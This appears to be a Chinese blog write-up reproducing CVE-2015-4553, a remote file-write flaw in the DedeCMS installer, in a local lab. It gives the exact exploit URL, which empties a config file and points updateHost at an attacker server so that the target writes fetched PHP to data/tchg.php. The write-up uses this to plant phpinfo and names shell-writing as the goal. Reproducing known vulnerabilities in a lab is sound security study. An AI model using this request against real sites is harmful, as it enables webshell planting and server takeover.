CVE-2015-4553 Dedecms远程写文件

CVE-2015-4553 Dedecms远程写文件

首页

访问

http://192.168.1.3/install/index.php?step=11\&insLockfile=a\&s_lang=a\&install_demo_name=.../data/admin/config_update.php这句话会跳转到http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt中读取内容写入到c:/phpstudy/WWW/config_update.php。访问发现获取失败。

在目标机上192.168.1.3,查看c:/phpstudy/WWW/data/admin/config_update.php,已经由原来的内容变为空的内容。

在192.168.1.2打开phpStudy在C:/phpStudy/WWW下建立dedecms/demodata.a.txt,写入<?php phpinfo();?>

访问:http://192.168.1.3/install/index.php?step=11\&insLockfile=a\&s_lang=a\&install_demo_name=.../data/tchg.php\&updateHost=http://192.168.1.2/,可以看到出现了存在,说明phpinfo已经写进去了![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/ff3eae6b0cc1432ea4c4603c3a954bf2.png)

访问:http://192.168.1.3/data/tchg.php,可以看到phpinfo页面说明真的写进去了。![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/198cefe5a2cf418a9bec2f5ef8fdd5d4.png)

漏洞产生的原因发生在安装页面C:/phpStudy/WWW/install/index.php,如果接收到的参数step=11,然后包含C:/phpStudy/WWW/data/admin/config_update.php。查看config_update.php里面定义了updateHost变量。前面已经把这个文件里的内容给清空了。这里利用了php5.2的特性,全局变量get可以赋值,这样就控制了上传的内容,达到了写shell的目的。

相关推荐
用户962377954482 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954483 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star3 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954483 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher4 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行7 天前
网络安全总结
安全·web安全
red1giant_star7 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透7 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全